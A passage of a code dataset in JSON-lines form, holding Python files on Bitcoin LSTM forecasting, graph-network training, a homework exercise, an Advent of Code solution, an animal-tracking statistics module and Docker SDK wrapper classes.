dataframe.std()\n\n # conver to numpy\n data_arr = np.array(dataframe, dtype=np.float32)\n\n # make tf timeseries from the np array\n # this particular set of data has an offset of 8 minutes\n sequence_length = 60 * 25\n # this is only keras >2\n ids = tf.keras.preprocessing.timeseries_dataset_from_array(\n data_arr,\n targets=None,\n sequence_length=sequence_length,\n sequence_stride=60,\n batch_size=64,\n start_index=8)\n ids = ids.map(split_window)\n return ids\n\n\ndef make_model():\n \"\"\" create the keras model for training later\n useful to have as separate function to easily change model later\n \"\"\"\n keras = tf.keras\n model = keras.models.Sequential()\n # potential extra lstm layer here\n model.add(keras.layers.LSTM(64, activation='relu', return_sequences=False))\n model.add(keras.layers.Dense(1))\n # es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=2,\n # mode='min')\n model.compile(optimizer='adam',\n loss='mse',\n metrics=[tf.metrics.MeanAbsoluteError()])\n return model\n\n\nif __name__ == \"__main__\":\n dfnoncor = pd.read_csv('processed_data.csv')\n n = len(dfnoncor)\n train_split = int(n * 0.8)\n\n # create separate training and validation training sets\n train_df = dfnoncor[:train_split]\n valid_df = dfnoncor[train_split:]\n\n # create tf datasets from them\n train_ds = keras_data(train_df)\n valid_ds = keras_data(valid_df)\n\n # create model\n dsmodel = make_model()\n\n # create earlys tsopping criteria\n es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=2,\n mode='min')\n\n # train the model\n hist = dsmodel.fit(x=train_ds,\n validation_data=valid_ds,\n callbacks=[es],\n epochs=20)\n","repo_name":"mag389/holbertonschool-machine_learning","sub_path":"supervised_learning/0x0E-time_series/forecast_btc.py","file_name":"forecast_btc.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39237429299","text":"# %load_ext autoreload\n# %autoreload 2\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nsys.path.insert(0, '..')\nimport models, graph, coarsening, utils\n# from utils import model_perf\n\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\nimport scipy.sparse as sp\nimport pickle as pkl\n\n# from tensorflow.examples.tutorials.mnist import input_data\n\n# %matplotlib inline\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# neural network setting\n# Graphs.\nflags.DEFINE_integer('number_edges', 8, 'Graph: minimum number of edges per vertex.')\nflags.DEFINE_string('metric', 'euclidean', 'Graph: similarity measure (between features).')\n# TODO: change cgcnn for combinatorial Laplacians.\nflags.DEFINE_bool('normalized_laplacian', True, 'Graph Laplacian: normalized.')\nflags.DEFINE_integer('coarsening_levels', 4, 'Number of coarsened graphs.')\n\n# Directories.\n# flags.DEFINE_string('dir_data', os.path.join('..', 'data', 'mnist'), 'Directory to store data.')\n\nresults_auc = dict()\nresults = list()\n\nclass model_perf(object):\n\n def __init__(self):\n self.names, self.params = set(), {}\n self.fit_auc, self.fit_losses, self.fit_time = {}, {}, {}\n self.train_auc, self.train_loss = {}, {}\n self.test_auc, self.test_loss = {}, {}\n self.train_represent = {}\n\n\n def test(self, model, name, params, data, train_pairs, train_labels, val_data, val_labels, test_pairs, test_labels):\n self.params[name] = params\n self.fit_auc[name], self.fit_losses[name], self.fit_time[name] = \\\n model.fit(data, train_pairs, train_labels, val_data, val_labels)\n # string, self.train_auc[name], self.train_loss[name], _ = \\\n # model.evaluate(train_data, train_labels)\n # print('train {}'.format(string))\n del val_data, val_labels\n n, v, m, f = data.shape\n if params['method'] == 'gcn' or params['method'] == '2gcn':\n test_data = np.zeros([test_pairs.shape[0], v, m, f, 2])\n test_data[:,:,:,:,0] = data[test_pairs[:,0], :, :, :]\n test_data[:,:,:,:,1] = data[test_pairs[:,1], :, :, :]\n elif params['method'] == 'fnn' or params['method'] == '2fnn':\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n test_data = np.zeros([test_pairs.shape[0], v, m*f, 2])\n test_data[:,:,:,0] = new_data[test_pairs[:,0], :, :]\n test_data[:,:,:,1] = new_data[test_pairs[:,1], :, :]\n print (test_data.shape)\n string, self.test_auc[name], self.test_loss[name], _, = \\\n model.evaluate(test_data, test_labels)\n print('test {}'.format(string))\n\n # f = open('test.roi.gcn.pkl', 'wb')\n # pkl.dump(test_represent, f, -1)\n # f.close()\n # f = open('test.roi.pairs.gcn.pkl', 'wb')\n # pkl.dump(test_pairs, f, -1)\n # f.close()\n # self.save_represent(model, data, train_pairs, train_labels, test_pairs, test_labels, params)\n self.names.add(name)\n\n def save_represent_fnn(self, model, data, train_pairs, train_labels, test_pairs, test_labels, params):\n\n n, v, m, f = data.shape\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n\n n_train = train_pairs.shape[0]\n num = int(np.ceil(n_train/10))\n represent = np.zeros([n_train, 84], dtype='float32')\n for i in range(10): # training data, split into 10 sets\n if (i+1)*num <= n_train:\n tmp_pairs = train_pairs[i*num:(i+1)*num,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m*f, 2])\n train_x[:,:,:,0] = new_data[tmp_pairs[:,0], :, :]\n train_x[:,:,:,1] = new_data[tmp_pairs[:,1], :, :]\n train_y = train_labels[i*num:(i+1)*num]\n print (train_x.shape)\n represent[i*num:(i+1)*num,:] = model.get_represent(train_x, train_y)\n else:\n tmp_pairs = train_pairs[i*num:,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m*f, 2])\n train_x[:,:,:,0] = new_data[tmp_pairs[:,0], :, :]\n train_x[:,:,:,1] = new_data[tmp_pairs[:,1], :, :]\n train_y = train_labels[i*num:]\n print (train_x.shape)\n represent[i*num:,:] = model.get_represent(train_x, train_y)\n f = open('train.roi.eu.gcn.pkl', 'wb')\n pkl.dump(represent, f, -1)\n f.close()\n f = open('train.roi.pairs.eu.gcn.pkl', 'wb')\n pkl.dump(train_pairs, f, -1)\n f.close()\n\n\n def save_represent(self, model, data, train_pairs, train_labels, test_pairs, test_labels, params):\n\n n, v, m, f = data.shape\n n_train = train_pairs.shape[0]\n num = int(np.ceil(n_train/20))\n represent = np.zeros([n_train, 84], dtype='float32')\n for i in range(20): # training data, split into 10 sets\n if (i+1)*num <= n_train:\n tmp_pairs = train_pairs[i*num:(i+1)*num,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m, f, 2])\n train_x[:,:,:,:,0] = data[tmp_pairs[:,0], :, :, :]\n train_x[:,:,:,:,1] = data[tmp_pairs[:,1], :, :, :]\n train_y = train_labels[i*num:(i+1)*num]\n print (train_x.shape)\n represent[i*num:(i+1)*num,:] = model.get_represent(train_x, train_y)\n else:\n tmp_pairs = train_pairs[i*num:,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m, f, 2])\n train_x[:,:,:,:,0] = data[tmp_pairs[:,0], :, :, :]\n train_x[:,:,:,:,1] = data[tmp_pairs[:,1], :, :, :]\n train_y = train_labels[i*num:]\n print (train_x.shape)\n represent[i*num:,:] = model.get_represent(train_x, train_y)\n f = open('train.roi.gcn.pkl', 'wb')\n pkl.dump(represent, f, -1)\n f.close()\n f = open('train.roi.pairs.gcn.pkl', 'wb')\n pkl.dump(train_pairs, f, -1)\n f.close()\n\n\n def save(self, data_type):\n results = list()\n for name in sorted(self.names):\n results.append([name, self.test_accuracy[name], self.train_accuracy[name],\n self.test_f1[name], self.train_f1[name], self.test_loss[name],\n self.train_loss[name], self.fit_time[name]*1000])\n\n if os.path.exists(data_type + '_results.csv'):\n old = pd.read_csv(data_type + '_results.csv', header=None)\n new = pd.DataFrame(data=results)\n r = pd.concat([old, new], ignore_index=True)\n r.to_csv(data_type + '_results.csv', index=False, header=['method', 'test_acc',\n 'train_acc', 'test_f1', 'train_f1', 'test_loss', 'train_loss', 'fit_time'])\n else:\n r = pd.DataFrame(data=results)\n r.to_csv(data_type + '_results.csv', index=False, header=['method', 'test_acc',\n 'train_acc', 'test_f1', 'train_f1', 'test_loss', 'train_loss', 'fit_time'])\n\n\n def fin_result(self, data_type, i_fold=None):\n for name in sorted(self.names):\n if name not in results_auc:\n results_auc[name] = 0\n results_auc[name] += self.test_auc[name]\n results.append([i_fold, self.test_auc[name]])\n if i_fold == 4:\n for name in sorted(self.names):\n results_auc[name] /= 5\n print('{:5.2f} {}'.format(\n results_auc[name], name))\n results.append([name, results_auc[name]])\n r = pd.DataFrame(data=results)\n r.to_csv('../../../data/output/' + data_type + '_fin_results', index=False, header=['method', 'test_auc'])\n\n\n def show(self, fontsize=None):\n if fontsize:\n plt.rc('pdf', fonttype=42)\n plt.rc('ps', fonttype=42)\n plt.rc('font', size=fontsize) # controls default text sizes\n plt.rc('axes', titlesize=fontsize) # fontsize of the axes title\n plt.rc('axes', labelsize=fontsize) # fontsize of the x any y labels\n plt.rc('xtick', labelsize=fontsize) # fontsize of the tick labels\n plt.rc('ytick', labelsize=fontsize) # fontsize of the tick labels\n plt.rc('legend', fontsize=fontsize) # legend fontsize\n plt.rc('figure', titlesize=fontsize) # size of the figure title\n print(' auc loss time [ms] name')\n print('test train test train test train')\n for name in sorted(self.names):\n print('{:5.2f} {:5.2f} {:.2e} {:.2e} {:3.0f} {}'.format(\n self.test_auc[name], self.train_auc[name],\n self.test_loss[name], self.train_loss[name], self.fit_time[name]*1000, name))\n\n\ndef preprocess_features(features, scale=1):\n \"\"\" Row-normalized by divide maximum of the row\"\"\"\n rowmax = np.max(features, axis=1).reshape(features.shape[0], 1)\n features = np.int_(scale*np.divide(features, rowmax))\n return features\n\n\ndef grid_graph(m, corners=False):\n z = graph.grid(m)\n dist, idx = graph.distance_sklearn_metrics(z, k=FLAGS.number_edges, metric=FLAGS.metric)\n A = graph.adjacency(dist, idx)\n\n # Connections are only vertical or horizontal on the grid.\n # Corner vertices are connected to 2 neightbors only.\n if corners:\n import scipy.sparse\n A = A.toarray()\n A[A < A.max()/1.5] = 0\n A = scipy.sparse.csr_matrix(A)\n print('{} edges'.format(A.nnz))\n\n print(\"{} > {} edges\".format(A.nnz//2, FLAGS.number_edges*m**2//2))\n return A\n\n\ndef get_feed_data(data, subj, pairs, labels, method='gcn'):\n train_pairs, val_pairs, test_pairs = pairs\n train_labels, val_labels, test_labels = labels\n n, v, m, f = data.shape\n if v == 6:\n print (val_labels.shape)\n n_val_pairs = 10000\n sidx = np.random.permutation(val_labels.shape[0])\n val_pairs = np.array([val_pairs[s, :] for s in sidx[:n_val_pairs]])\n val_labels = np.array([val_labels[s] for s in sidx[:n_val_pairs]])\n # test_pairs = np.array([test_pairs[s, :] for s in sidx[n_val_pairs:]])\n # test_labels = np.array([test_labels[s] for s in sidx[n_val_pairs:]])\n # f = 1 # whether f can be deleted\n if method == 'gcn' or method == '2gcn':\n val_x = np.zeros([val_pairs.shape[0], v, m, f, 2])\n val_x[:,:,:,:,0] = data[val_pairs[:,0], :, :, :]\n val_x[:,:,:,:,1] = data[val_pairs[:,1], :, :, :]\n elif method == 'fnn' or method == '2fnn':\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n val_x = np.zeros([val_pairs.shape[0], v, m*f, 2])\n val_x[:,:,:,0] = new_data[val_pairs[:,0], :, :]\n val_x[:,:,:,1] = new_data[val_pairs[:,1], :, :]\n\n train_y = train_labels\n val_y = val_labels\n test_y = test_labels\n del subj\n del train_labels, val_labels, test_labels\n del val_pairs\n return train_pairs, train_y, val_x, val_y, test_pairs, test_y\n\n\ndef train(method, view_com, n_views, k, m, n_epoch, batch_size, pairs, labels, coords, subj, data, data_type, i_fold):\n str_params = view_com + '_k' + str(k) + '_m' + str(m) + '_'\n obj_params = 'softmax'\n print (str_params)\n\n print ('Construct ROI graphs...')\n t_start = time.process_time()\n # A = grid_graph(86, corners=False)\n # A = graph.replace_random_edges(A, 0)\n coo1, coo2, coo3 = coords.shape # coo2 is the roi dimension\n features = np.zeros([coo1*coo3, coo2])\n for i in range(coo3):\n features[coo1*i:coo1*(i+1), :] = coords[:, :, i]\n dist, idx = graph.distance_scipy_spatial(np.transpose(features), k=10, metric='euclidean')\n A = graph.adjacency(dist, idx).astype(np.float32)\n\n if method == '2gcn':\n graphs, perm = coarsening.coarsen(A, levels=FLAGS.coarsening_levels, self_connections=False)\n L = [graph.laplacian(A, normalized=True) for A in graphs]\n data = coarsening.perm_data1(data, perm, True)\n else:\n graphs = list()\n graphs.append(A)\n L = [graph.laplacian(A, normalized=True)]\n\n print('Execution time: {:.2f}s'.format(time.process_time() - t_start))\n # graph.plot_spectrum(L)\n del A\n\n print ('Set parameters...')\n mp = model_perf()\n # Architecture.\n common = {}\n common['dir_name'] = 'ppmi/'\n common['num_epochs'] = n_epoch\n common['batch_size'] = batch_size\n common['eval_frequency'] = 5 * common['num_epochs']\n common['patience'] = 5\n common['regularization'] = 5e-3\n common['dropout'] = 1\n common['learning_rate'] = 1e-2\n common['decay_rate'] = 0.95\n common['momentum'] = 0.9\n common['n_views'] = n_views\n common['view_com'] = view_com\n # common['brelu'] = 'b1relu'\n # common['pool'] = 'mpool1'\n\n print ('Get feed pairs and labels...')\n train_pairs, train_y, val_x, val_y, test_pairs, test_y = get_feed_data(data, subj, pairs, labels, method)\n C = max(train_y)+1\n common['decay_steps'] = train_pairs.shape[0] / (common['batch_size'] * 5)\n\n\n if method == 'fnn':\n str_params += 'siamese_'\n name = 'mvfnn'\n params = common.copy()\n params['method'] = 'fnn'\n params['fin'] = 1\n params['F'] = [m]\n params['K'] = [1]\n params['p'] = [1]\n params['M'] = [C]\n params['dir_name'] += name\n mp.test(models.siamese_fnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n if method == '2fnn':\n str_params += 'siamese_layer2_'\n name = 'mvfnn2'\n params = common.copy()\n params['method'] = 'fnn'\n params['fin'] = 1\n params['F'] = [m]\n params['K'] = [1]\n params['p'] = [1]\n params['M'] = [64, C]\n params['dir_name'] += name\n mp.test(models.siamese_fnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n if method == 'gcn':\n # str_params += 'b_max_eu_'\n name = 'mvgcn'\n params = common.copy()\n params['method'] = 'gcn'\n params['F'] = [m] # filters\n params['K'] = [k] # supports\n params['p'] = [1]\n params['M'] = [C]\n params['fin'] = val_x.shape[3]\n params['dir_name'] += name\n params['filter'] = 'chebyshev5'\n params['brelu'] = 'b2relu'\n params['pool'] = 'apool1'\n mp.test(models.siamese_m_cgcnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n # Common hyper-parameters for LeNet5-like networks.\n if method == '2gcn':\n str_params += 'p4_fc64_'\n name = 'mvgcn2'\n params = common.copy()\n params['method'] = '2gcn'\n params['F'] = [m, 64] # filters\n params['K'] = [k, k] # supports\n params['p'] = [4, 4]\n params['M'] = [512, C]\n params['fin'] = val_x.shape[3]\n params['dir_name'] += name\n params['filter'] = 'chebyshev5'\n params['brelu'] = 'b2relu'\n params['pool'] = 'apool1'\n mp.test(models.siamese_m_cgcnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n # mp.save(data_type)\n method_type = method + '_'\n mp.fin_result(method_type + data_type + str_params + obj_params, i_fold)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('method', type=str)\n parser.add_argument('data_type1', type=str)\n parser.add_argument('data_type2', type=str)\n parser.add_argument('data_type3', type=str)\n parser.add_argument('data_type4', type=str)\n parser.add_argument('data_type5', type=str)\n parser.add_argument('data_type6', type=str)\n parser.add_argument('view_com', type=str)\n parser.add_argument('kfold', type=str)\n parser.add_argument('K', type=int)\n parser.add_argument('M', type=int)\n parser.add_argument('n_epoch', type=int)\n parser.add_argument('batch_size', type=int)\n args = parser.parse_args()\n print ('---------------------------------------')\n data_type = [args.data_type1, args.data_type2, args.data_type3, args.data_type4, args.data_type5, args.data_type6]\n n_views = len(data_type)\n # See function train for all possible parameter and there definition.\n data, subj, coords, pairs, labels = utils.load_data(data_type=data_type, kfold=args.kfold)\n data_type = args.data_type1 + '+' + args.data_type2 + '+' + args.data_type3 + '+' + args.data_type4 + '+' + args.data_type5 + '+' + args.data_type6\n print (data.shape)\n if args.kfold == 'True':\n for l in range(5):\n if l >= 1:\n break\n print (\"The %d fold ...\" %(l+1))\n train(method=args.method,\n view_com=args.view_com,\n n_views=n_views,\n k=args.K,\n m=args.M,\n n_epoch=args.n_epoch,\n batch_size=args.batch_size,\n pairs=pairs[l],\n labels=labels[l],\n coords=coords,\n subj=subj,\n data=data,\n data_type=data_type,\n i_fold=l)\n else:\n print ('fixed split')\n train(method=args.method,\n view_com=args.view_com,\n n_views=n_views,\n k=args.K,\n m=args.M,\n n_epoch=args.n_epoch,\n batch_size=args.batch_size,\n pairs=pairs,\n labels=labels,\n coords=coords,\n subj=subj,\n data=data,\n data_type=data_type)\n","repo_name":"sheryl-ai/MVGCN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":18330,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"91"}
+{"seq_id":"16357973239","text":"number=[str(i) for i in range(1,11)]\r\nletter=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"]\r\nmix1=[[i+j for i in number] for j in letter]\r\nmix2=[[j+i for i in number] for j in letter]\r\nnew1=[]\r\nnew2=[]\r\nfor i in range(0,3):\r\n for k in range (0,3):\r\n new1.append(mix1[i][k])\r\n new2.append(mix2[i][k])\r\nprint(\"1.\",sorted(new1),\"\\n\",\"2.\",sorted(new2),sep=\"\")\r\n\r\n","repo_name":"UfukD2019/Python-Homework-5.-Week","sub_path":"Homework 3 - Bonus.py","file_name":"Homework 3 - Bonus.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5766248796","text":"data = []\n\nwith open('day12_input.txt', 'r') as infile:\n for line in infile:\n data.append(line)\n\n\ndef part_1():\n facing = 'E'\n ns_val = 0 # positive val is north, negative south\n ew_val = 0 # positive val east, negative west\n\n for line in data:\n direction = line[0]\n magnitude = int(line[1:])\n rotating = False\n\n R = {'N': 'E', 'E': 'S', 'S': 'W', 'W': 'N'}\n L = {'N': 'W', 'E': 'N', 'S': 'E', 'W': 'S'}\n\n if direction == 'R':\n rotating = True\n while magnitude > 0:\n facing = R.get(facing)\n magnitude -= 90\n elif direction == 'L':\n rotating = True\n while magnitude > 0:\n facing = L.get(facing)\n magnitude -= 90\n elif direction == 'F':\n direction = facing\n\n if not rotating:\n if direction == 'N':\n ns_val += magnitude\n elif direction == 'S':\n ns_val -= magnitude\n elif direction == 'E':\n ew_val += magnitude\n elif direction == 'W':\n ew_val -= magnitude\n\n print(f'final coordinates NS{ns_val}, EW{ew_val}')\n print(abs(ew_val) + abs(ns_val))\n\n\ndef part_2():\n # ship starts at origin and waypoint starts at 10E, 1N\n ship_ns_val = 0 # positive val is north, negative south\n ship_ew_val = 0 # positive val east, negative west\n wp_ns_val = 1\n wp_ew_val = 10\n\n for line in data:\n direction = line[0]\n magnitude = int(line[1:])\n\n if direction == 'N':\n wp_ns_val += magnitude\n elif direction == 'S':\n wp_ns_val -= magnitude\n elif direction == 'E':\n wp_ew_val += magnitude\n elif direction == 'W':\n wp_ew_val -= magnitude\n elif direction == 'F':\n ship_ns_val += magnitude * wp_ns_val\n ship_ew_val += magnitude * wp_ew_val\n elif direction == 'L':\n times_to_rotate = int(magnitude / 90)\n for i in range(0, times_to_rotate):\n old_ns = wp_ns_val\n old_ew = wp_ew_val\n wp_ns_val = old_ew\n wp_ew_val = -1 * old_ns\n elif direction == 'R':\n times_to_rotate = int(magnitude / 90)\n for i in range(0, times_to_rotate):\n old_ns = wp_ns_val\n old_ew = wp_ew_val\n wp_ns_val = -1 * old_ew\n wp_ew_val = old_ns\n print(abs(ship_ns_val)+ abs((ship_ew_val)))\n \n\npart_2()\n","repo_name":"rorour/AdventOfCode2020","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22159079122","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport os\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom .utils import general as utils\nfrom .write_to_file import write_registrations_stats\nfrom .plotting_functions import single_timeline_heat_map\n\n\ndef get_single_antenna_stats(ecohab_data, timeline, binsize, antennas=\"ALL\",\n res_dir=\"\", prefix=\"\", remove_mouse=\"\",\n delimiter=\";\"):\n \"\"\"\n Count number and combined durations of registrations of each mouse tag\n by specified antennas in bins of size binsize for tags\n registered in every phase.\n\n Args:\n ecohab_data : Loader or Loader_like\n Eco-HAB dataset.\n timeline : Timeline\n timeline of the experiment.\n binsize : number\n time bins for calculating activity\n A number value specifies number of seconds in each bin, e.g. binsize\n equal 3600 results in 1 h bins.\n antennas: string, int or list of ints\n Ids of registering antennas.\n Default value is all antennas\n res_dir : string\n destination directory\n default value is the destination directory established for\n ecohab_data.\n prefix : string\n string added to the name of every generated results file\n default value is the prefix established for ecohab_data\n remove_mouse : string or list\n name of mouse or mice to be removed from the results file\n As a default activity will be established for every mouse registered\n in ecohab_data.\n delimiter : str, optional\n String or character separating columns.\n \"\"\"\n if prefix == \"\":\n prefix = ecohab_data.prefix\n if res_dir == \"\":\n res_dir = ecohab_data.res_dir\n mice = utils.get_mice(ecohab_data.mice, remove_mouse)\n add_info_mice = utils.add_info_mice_filename(remove_mouse)\n out_dir = os.path.join(\"other_variables\", \"registration_stats\")\n bin_ = binsize/3600\n fname_durations = \"registration_duration_%4.2fh\" % bin_\n fname_count = \"registration_count_%4.2fh\" % bin_\n shortest_phase = utils.get_shortest_phase_duration(timeline)\n if binsize <= shortest_phase:\n phases = timeline.sections()\n times = [timeline.get_time_from_epoch(phase) for phase in phases]\n else:\n t_start, t_end = timeline.get_time_from_epoch(\"ALL\")\n phases = []\n times = []\n i = 0\n while t_start < t_end:\n phases.append(\"%dxbin_%5.2fh\" % (i, bin_))\n times.append((t_start, t_start+binsize))\n t_start += binsize\n i += 1\n if antennas == \"ALL\":\n antennas = sorted(set(ecohab_data.get_antennas(ecohab_data.mice)))\n if antennas in ecohab_data.all_antennas:\n antennas = [antennas]\n if not isinstance(antennas, list):\n raise Exception(\"\"\"Incorrect antenna format.\n You should either provide a list of ints, an int or 'ALL'\"\"\")\n\n for i, phase in enumerate(phases):\n t_start, t_end = times[i]\n count = OrderedDict()\n durations = OrderedDict()\n for antenna in antennas:\n count[antenna] = OrderedDict()\n durations[antenna] = OrderedDict()\n for mouse in mice:\n results = ecohab_data.get_registration_stats(mouse,\n t_start,\n t_end,\n antenna,\n binsize)\n count[antenna][mouse], durations[antenna][mouse] = results\n\n single_timeline_heat_map(durations[antenna],\n res_dir,\n mice,\n prefix,\n phase,\n binsize,\n antenna,\n out_dir)\n new_fname_count = \"%s_%s\" % (fname_count, antenna)\n new_fname_durations = \"%s_%s\" % (fname_durations, antenna)\n write_registrations_stats(count, phase, mice, binsize,\n new_fname_count, res_dir,\n out_dir, prefix,\n add_info=add_info_mice, delimiter=\";\")\n write_registrations_stats(durations, phase, mice, binsize,\n new_fname_durations, res_dir,\n out_dir, prefix,\n add_info=add_info_mice, delimiter=\";\")\n","repo_name":"Neuroinflab/pyEcoHAB","sub_path":"src/pyEcoHAB/single_antenna_registrations.py","file_name":"single_antenna_registrations.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"8211060760","text":"import logging\n\nimport docker\n\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger('docker').setLevel(logging.WARNING)\n\n\nclass BaseDocker(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.client = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def info(self):\n try:\n info = self.client.info()\n except Exception as e:\n logger.error(\"Docker Info failed: {}\".format(e))\n raise e\n else:\n # return dict.\n return info\n\n def ping(self):\n try:\n result = self.client.ping()\n except Exception as e:\n logger.error(\"Docker Server not avaliable: {}\".format(e))\n raise e\n else:\n # return bool\n return result\n\n def login(\n self, username, password, registry='https://index.docker.io/v1/',\n email=\"canuxcheng@gmail.com\",\n reauth=True, dockercfg_path=\"$HOME/.docker/config.json\"\n ):\n try:\n res = self.client.login(\n username, password, email, registry, reauth, dockercfg_path\n )\n except Exception as e:\n logger.error(\"Docker Login failed: {}\".format(e))\n raise e\n else:\n # return dict\n logger.debug(res)\n return res\n\n\nclass BaseSwarm(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.swarm = None\n\n @property\n def id(self):\n return self.swarm.id\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.swarm = self.client.swarm\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n def init(\n self, advertise_addr=None, force_new_cluster=True,\n # default_addr_pool=[\"10.0.0.0/8\"],\n default_addr_pool=[\"10.0.0.0/8\"],\n subnet_size=None, listen_addr='0.0.0.0:2377',\n **kwargs\n ):\n try:\n node_id = self.swarm.init(\n advertise_addr=advertise_addr, listen_addr=listen_addr,\n force_new_cluster=force_new_cluster,\n default_addr_pool=default_addr_pool,\n subnet_size=subnet_size, **kwargs\n )\n except Exception as e:\n logger.error(\"Docker Swarm init failed: {}\".format(e))\n raise e\n else:\n return node_id\n\n def join(\n self, remote_addrs=None, join_token=None, advertise_addr=None,\n listen_addr='0.0.0.0:2377', **kwargs\n ):\n try:\n result = self.swarm.join(\n remote_addrs=remote_addrs, join_token=join_token,\n listen_addr=listen_addr, advertise_addr=advertise_addr,\n **kwargs\n )\n except Exception as e:\n logger.error(\"Docker Swarm join failed: {}\".format(e))\n raise e\n else:\n # return True\n return result\n\n def leave(self, force=True):\n try:\n result = self.swarm.leave(force=force)\n except Exception as e:\n logger.error(\"Docker Swarm leave failed: {}\".format(e))\n raise e\n else:\n # return True\n return result\n\n\nclass BaseNetworks(object):\n def __init__(\n self, base_url='unix://var/run/docker.sock',\n version=\"auto\", timeout=60, **kwargs\n ):\n self.base_url = base_url\n self.version = version\n self.timeout = timeout\n self.kwargs = kwargs\n\n self.networks = None\n\n def __enter__(self):\n try:\n self.client = docker.DockerClient(\n self.base_url, version=self.version, timeout=self.timeout,\n **self.kwargs\n )\n if self.client is None:\n logger.error(\"No connection object returned.\")\n raise Exception(\"Connection failed.\")\n self.networks = self.client.networks\n return self\n except Exception as e:\n logger.error(\"Failed to connection to dockerd: {}\".format(e))\n raise e\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.client:\n self.client.close()\n\n @staticmethod\n def get_ipam_pool(\n subnet=None, iprange=None, gateway=None, aux_addresses=None\n ):\n try:\n ipam_pool = docker.types.IPAMPool(\n subnet=subnet, iprange=iprange, gateway=gateway,\n aux_addresses=aux_addresses\n )\n except Exception as e:\n logger.error(\"Get ipam pool failed: {}\".format(e))\n raise e\n else:\n return ipam_pool\n\n @staticmethod\n def get_ipam_config(\n driver=\"default\", pool_configs=None, options=None\n ):\n try:\n ipam_config = docker.types.IPAMConfig(\n driver=driver, pool_configs=pool_configs, options=options\n )\n except Exception as e:\n logger.error(\"Get IPAM config failed: {}\".format(e))\n raise e\n else:\n return ipam_config\n\n def create(\n self, name=None, driver=\"bridge\", scope=\"local\", ipam=None,\n check_duplicate=False, internal=False, enable_ipv6=False,\n attachable=False, ingress=False, options=None, labels=None\n ):\n try:\n network = self.networks.create(\n name=name, driver=driver, options=options, ipam=ipam,\n check_duplicate=check_duplicate, internal=internal,\n labels=labels, enable_ipv6=enable_ipv6, attachable=attachable,\n scope=scope, ingress=ingress\n )\n except Exception as e:\n logger.error(\"Docker network create failed: {}\".format(e))\n raise e\n else:\n # return Network object\n return network\n\n def create_bridge_network(\n self, name, subnet, iprange, gateway, opt_name, opt_icc, opt_im,\n attachable\n ):\n try:\n pool_config = self.get_ipam_pool(\n subnet, iprange, gateway\n )\n ipam_config = self.get_ipam_config(\n driver=\"default\", pool_configs=[pool_config], options=None\n )\n bridge = self.create(\n name=name, driver=\"bridge\", ipam=ipam_config,\n check_duplicate=True, internal=False, attachable=attachable,\n ingress=False, enable_ipv6=False, scope=\"local\",\n options={\n \"com.docker.network.bridge.enable_icc\": opt_icc,\n \"com.docker.network.bridge.enable_ip_masquerade\": opt_im,\n \"com.docker.network.bridge.name\": opt_name\n },\n labels=None\n )\n except 